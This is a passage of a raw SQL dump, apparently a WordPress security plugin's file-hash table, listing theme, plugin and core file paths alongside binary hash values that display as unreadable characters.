}��*:','wp-content/themes/hueman/assets/front/img/ie/opacity-70.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<yl4ɭ��n{�a��','�1�n����rEk�,T��\0�ъ���\'�7t�z','',0,'?'),('��<��s�+�>>�','wp-content/themes/travelify/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�&�$d��� @5@�','��?\\���\"T�9�0���TzΥ�!VM���','',0,'?'),('�\0��[\\��oxe۷*','wp-content/themes/relia/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���˙/�	_���','�,�kdH��g��-��\n���ϻ�¡י3+�Ji','',0,'?'),('��[B�^��	Z�1�','wp-content/themes/twentynineteen/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\nqYĸ`p����','�?Zt-�(D��~���$mͼ�wj�x$\n�^E�','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6T�g*\Z�:	�x7��','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��f?Yk�EЉ��+V','a�+)	�h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)�	>','',0,'?'),('�Q�P� �۾Օ\0��F','wp-content/themes/hueman/functions/czr/tmpl/inputs/img-uploader-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�⧀�Lę��E(','o�6�C�SۨO�5�h�I�B����<��l','',0,'?'),('�R)�����!����','wp-content/themes/vega/assets/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�Y����r�d','���~	+6�����bFf��9hPρ���,��','',0,'?'),('�U�����K����6I�','wp-content/themes/precious-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	K@|s+b�fV�?��','Q]�>�#E����S��[Ӗ+`��0�V#','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�JC�C�ˋ����p&�','�@_�-�(��XX\\�s�T��tZX�`�/��','',0,'?'),('�gA�T+��]	dK�>�','wp-content/themes/travelify/languages/pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�DS�x�������?','Ï_ƇM��$����\nq�G���oKk葜�','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('��#�dl|M�SRə','wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php',0,'o��$�\n�eďgS�L�','o��$�\n�eďgS�L�','���Q�h�O)�#�\n.�\0��c�Mr�:ԭ��','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('���. I�/����','wp-content/plugins/unyson/framework/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('��N%�c��)�҉c','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/img/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1s�N:���;�I�','g��:jpB�D��b�R�o��rf?�U�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MQ�@��Ǯ���I','����~�r�b�wTN�s��;3f��B���)A','',0,'?'),('��2�1��Ԙ�ˮ̉`','wp-content/themes/fluida/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8���\"�Q]@�','��\"�\\X����� 6$kIθ�$޶���','',0,'?'),('���9�/W�Ѓ*����','wp-content/themes/morfeu/page-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0	�bдa(�Kz','��ł�עN{:뮧��Ga�4!�4�<_�a��','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa	y�fh��0v\'u�vm�','',0,'?'),('��\'a� �QxU�Y�L','wp-content/plugins/unyson/framework/extensions/builder/helpers.php',0,'�3�W舸*�-T�e�#g','�3�W舸*�-T�e�#g','\r���@���&�����J>}��]ټYsŮ��=�','',0,'?'),('���i�D(Z�\n�.i�S','wp-content/themes/lightly/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�$����!��z��','ό�;R�����s�x�}��|4>��ƙ`2����','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r(���=����yC','����ŀ5+�>�	�Z�1.�5>O�8���','',0,'?'),('��҈�NI%Y0�c#�','wp-content/themes/panoramic/library/fonts/font-awesome/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]o]Z���ЖQ�i�T',' �{�Vie��)36�K�L�w���$k���','',0,'?'),('��w��i.�w�(M;0D','wp-content/plugins/akismet/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��|���2-�#�','�J�S�\\<�Cޏ�=s\'WI&\Z�(���vaTo','',0,'?'),('�!k��ߚ��\0��L','wp-content/plugins/spam-captcha/core/lang/SL_framework-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�.\\K�Z.H��A�a','ì��BpQ����s�gR��r�$�˳����(�','',0,'?'),('���ws� ��+���C\'','wp-content/themes/twentytwenty/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�l���Ѽ	&.���','�_7�����\\�7�Hms��.:[)��dM�','',0,'?'),('� �&?�F�ZiE�Od','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php',0,'3���Y��.�)���{�','3���Y��.�)���{�','�BŤ��%��wZ�}?�&4�\r��,����H���','',0,'?'),('�\"�T�b9��d�5�c#','wp-content/themes/the-minimal/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-J�%�z����u�','	���(G��0�Z���qQw���`����·','',0,'?'),('�-�B]^����=��','wp-content/themes/verbosa/admin/images/logo-about-top.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j\0P�1�=Dx','�4��~g�6�nn��4x��ͼ�]��X�N\"','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%=搨1rup�C�\"��','�������Y�r���\\�3,�áL�Tq6>','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�7pF�s���O���ȳ','wp-content/themes/alpha-store/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9OhMf��f�]>�','E�VS`$?�a�j`)��x�0��+X����K��','',0,'?'),('�;�N\\F5�P�29ֲ`','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-social-fields.php',0,'KP�G��$��0g�_��','KP�G��$��0g�_��','���[��6������2��qo�e����G�$�','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�X*����VL	�_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tmPS<ؙ�ĉ-\0�$','�\'\r!r�2����&��h#�wYrS1/S','',0,'?'),('�eL�ω���I��.ې','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-bg_glass_100_fdf5ce_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�F1���o���P�','��q�_i�<�[��XVh�s�$����{�Z4�-�','',0,'?'),('�j��I���<꟟��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S]y��m�ʇ}�`x\Z4','W�[�\\�u[ST�\'��u�7u\Z,�Mf:��Y��','',0,'?'),('�rK���;��n��`~�','wp-content/themes/supernews/acmethemes/customizer/customizer-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�7�x��F4�Ĩ]','qD��X��ɜ[�+���;��5����H|�\\','',0,'?'),('�r��e��LV����','wp-content/plugins/unyson/framework/static/libs/qtip/css/jquery.qtip.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���sr�o�����','�e�³�y^�f��<�V�B`=��p��3.\r��','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('����V���լb��`','wp-content/themes/lightly/js/vendor/selectivizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@*�1�:�_\r���','0~3F��SQ�K���};20Z�K)\r���x\'','',0,'?'),('��Od9zwM��%�G7','wp-content/plugins/spam-captcha/core/js/parameters_admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���#�U\r��*t�k','�^\0�0��u�h�_���R�\n�|�o�����H��@','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('����uy~�%#����','wp-content/themes/the-minimal/images/list-style-type.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�cx�#|+����','�3�~�&c�>i`k������=\\(�yŽ`j�ʒ','',0,'?'),('���s��c��ˠ|�9','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr.js',0,'y�ى�����6�+K�','y�ى�����6�+K�','w&�g��ns��m��w<�9.�c��7c:�+�','',0,'?'),('��3�������r��','wp-content/themes/accelerate/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �����:���','Qa�$��4�Q����v�$!1c.̀痸�_��','',0,'?'),('��Nc�`\0~\Z�C>���','wp-content/themes/square/inc/js/chosen.jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e���@!}��\'2�C��','����}��U�s�I��ΞRm�k�m��ΐ8���','',0,'?'),('��K���^�ۇCy�N;','wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�&N��j8Sp��T','/�k7�6L��$�ፖt�Y�-.f��=At͗@|�','',0,'?'),('��e�\\��1�tƋ�<	�','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('���cg��p�ݥ\"Xջ','wp-content/plugins/unyson/framework/extensions/update/extensions/github-update/manifest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S��s��O�����','6$I��$;tkt�-z���Q;�aO��ʲۿ��','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��9b��\r$1�\\3=�\n','wp-content/themes/aqueduct/img/slider-thumbnail.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V���Ӭ��T�dx�8','K��4)��n�P(@�<[���\'�V�ԝ�D�k','',0,'?'),('��Э_���%�b�`','wp-content/plugins/unyson/framework/static/img/sort-vertically.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y\r�N颏�<3�c���','h��^��u�%0ˮ��� ���[��Դ��','',0,'?'),('�ŷ�Dp3�e��7�','wp-content/plugins/unyson/framework/helpers/class-fw-flash-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2V�v���\0\r�� ɔ�','�\\i��-\0ӳ:��(��yq\"a�6ٿ��mp���','',0,'?'),('��\"Ξ�˸�pұ=FWN','wp-content/themes/hueman/option-tree/assets/fonts/option-tree-font.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Er��6k�a��','���[��g����U�Hj�V��n�e�2','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*M�`��˗��m���','�Nhus�oJW6�f,�#�1 ����6W��','',0,'?'),('����R��l�\"&��#�','wp-content/themes/illdy/layout/images/front-page/front-page-project-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�\r�]��Bj���e','�{p��%�F�^ށBD8�v��a�����Y','',0,'?'),('��r�~V�n����ȟ','wp-content/plugins/unyson/framework/core/extends/interface-fw-option-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���aN�^ت����','��͡u�,q,vй�_�gL�z�i��O$i�9','',0,'?'),('��#H�\r������lQ','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=V��\Zg���Y�','�U���W��pOU��B��l�*�;s�n�','',0,'?'),('��n:�06�e�:́���','wp-content/themes/supernews/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`g����ÄN`E�','�u�v����#J��r�,�q��>�&��e�X)���','',0,'?'),('��I���D�f��','wp-content/themes/square/css/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]%����5ptHg�','��E4.t)�|(7��J���>n;\Z^��h\nØ','',0,'?'),('����! sȧy���I\r�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/class-api-libs.php',0,'5&-����X�5���','5&-����X�5���','V��R��E�:}Y��b��3ɞ�.�/{z�BR','',0,'?'),('�\r�b!E��jڵX','wp-content/plugins/contact-form-7/includes/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�x�����%9үa','���)7U=�Jd�M<�Պ�0��8�K','',0,'?'),('�fR��:���z�c��','wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.scrollVert.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\"�U2M|����f��b','T�HG��pyI���L�v����Oa��2h','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��l^��1�E	A�,','�\0u�M5a����65�\r�2��*tF��4����L','',0,'?'),('�?{�!r�*B��H��','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-enumerate-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?�=3V�6:�C','Iߪv���ѯe�0k�$�Im��[;\\����','',0,'?'),('�C��|q�\Z���CW�','wp-content/plugins/unyson/framework/includes/option-types/map/views/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';K���S�Bx7�<�m','6130����\0��	�N[F���څ�uex','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',0,',~%D��w�k�\r��.',',~%D��w�k�\r��.','����4�F\r����O/��P�m��R:P�b��','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�Vf>	|W�ٗIAiE','wp-content/themes/vega/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+[5`Q㎤��\r��','FvG��]c��Bi�;��v�v^��~�c#�','',0,'?'),('�d��RĆC�P���b&','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\rW�����Н','%��?�\Z�v�bq]��g�5Z)u�Ѷ\Z�o�\'�0','',0,'?'),('�kIK����V[��	5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('�vd�<��=��j�\"�','wp-content/themes/nirvana/fonts/Oswald-Regular-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7]��2���y�d�t.�','I{��/=M�z�	9�A�m�Ɨ�\'�a>},�<','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�|���T�?{�qߏg�','wp-content/themes/wen-business/inc/helper/common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k/���߷b�4o�f�','�������/?����\'��D��\\U��X�����','',0,'?'),('����q ����FT�','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{�dK�v�L4�eٰ','���-b2pz�}_�#B��+�hS���Vq�','',0,'?'),('����-~���n�;Bc�','wp-content/plugins/unyson/framework/includes/option-types/switch/static/adaptive-switch/jquery.adaptive-switch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��m<�i�O2\\i�','�&\Z(� ���G�ު�T���9	�%|$�+��)�','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��=��y�G\0�\'Y','A���5��,S�rOkw�	�G�=�r�W�Yn�','',0,'?'),('��݂��g_Z�X�2�','wp-content/plugins/unyson/framework/helpers/type/class-fw-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ���C�e^R=C','��Sg$���������ݣ\n��BFZ���v��','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('��\n:�B�Ob�{��g','wp-content/themes/sg-window/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��YG�B��W<e˄','��e�\\I�Uo�oK����}Q�r\"|��w�\\�','',0,'?'),('��A��ť�NƢn��','wp-content/themes/illdy/sections/blog-bottom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w����ճ\n��','щy�18e~��++R2��\Z���J����>J��','',0,'?'),('��2�R�h��o��\r','wp-content/plugins/spam-captcha/lang/spam_captcha-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���◔��–���u','�}C7��w�J�����Ez>J8��#��כ�Z]�','',0,'?'),('�֥Lǽ��K�a�L��','wp-content/themes/hueman/assets/admin/img/footer-widgets-0.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���t�7�j\'��}�','!�۫�s`�YQ��dO\n���^U�]�m��M}','',0,'?'),('���LL��$�#c�J�','wp-content/themes/tortuga/inc/customizer/functions/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5n�K�%�q���y�=�','Ry]���9��()�}&x�	@�Z#��/z%','',0,'?'),('��Qs|�c�L؜VH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F!��S�]C�q�.�','\Z�W��a;�7j�I��Bگ��M�\r�Ox�$(�','',0,'?'),('��P�;�L�ri�u���','wp-content/themes/square/css/owl.theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ᗼ4�F(~|�U�PF�','I��l)�\r�S3o���L���NBΎp�z!�','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','՝”��kr?R|B��','��5��v���\n���Zf�Yԁ�������','',0,'?'),('��7�̳*|b���_','wp-content/themes/fluida/cryout/framework.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�����Ȣ]Q��\0',',yx��g+�F�`�@b�t�ؘO��r�(�$��','',0,'?'),('�*�9ˠV\\�\0j�0�','wp-content/themes/hueman/languages/es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<`~�ō�7\"ĺ','~A��ײ�b��/BȘg���6��M','',0,'?'),('�<o�u�!Ѹ�P� ��','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/img/logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5��؀\0�� �Eq\Zv','�8�߃gԄ#����:D��Ekb�dW0��','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&(cp���׵�+�','�o��#E)n��h8bb�\"К�d�����)�','',0,'?'),('�PX=������s','wp-content/themes/clean-magazine/inc/widgets/social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�0N���$��>eR','9z��94i�[�CJ��[�Ԧ���H4DT��','',0,'?'),('�S<��s��ݾ���','wp-content/plugins/spam-captcha/screenshot-5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';yZ��o,i�����','��tOi���#�k���`3�G>}�%���D�I4','',0,'?'),('�]�\ZqjP�i$x<JA�e','wp-content/themes/nirvana/content/content-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ю���<I��','�~v�\r=�> �Lr\rdmU��lH�~#��r�m�','',0,'?'),('�n97�I.O�ҝ޿�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('��N�c�m�n�P�pu','wp-content/themes/verbosa/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�~9��t4�(�','1I��ޟ_��ƨB�c��8)��\\ �Hl�#VP','',0,'?'),('��,ک�?)mM}�ʢ�R','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.rs-latin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�2e>j8��&�_','Q��f5f�U҄d����HU�\'�\Z�V��y��>','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4	춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('��f餧xM�P]~B��','wp-content/plugins/akismet/class.akismet-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��� ���qE9g:I','v26�}۞���\Z�\no��g$�$�@[�C�\\V','',0,'?'),('��k䗐g%\"�M)]�','wp-content/themes/sg-window/inc/social-media-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���seN�\'��y;4��','B�\Z\'y�dM��a�s�	6i%?��z��_��b','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('��α������=�-�ߍ','wp-content/themes/lightly/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����6��{��9AH','�\r�8��γe���y���̿ǹ��H����-�_','',0,'?'),('���?5p`;��9�|','wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2	������m(ܱ','+�M����]���7�?��%i>��}�I�,����','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��{��^vƍ����','Z��%��ĩZ�d�^����m���͖(8��ծ','',0,'?'),('���䉢���.�i)','wp-content/themes/vega/sample/images/featured-image-4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����zw���g/q��','�q��*^�\0�=/���[��3�l^ih�@��*�','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^�	�v�4|f�%�Xg','',0,'?'),('��U�]R���)Y��m','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�j����0�����9','��\Z�Ҩ2�#��s:�Р\n		v��Ø+l�','',0,'?'),('����=<q�=�ɫ','wp-content/themes/nirvana/languages/hr.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�X�C�:��T�ȫ�|','��U�O<ra�H��1S��v���	)5$�$��','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('� 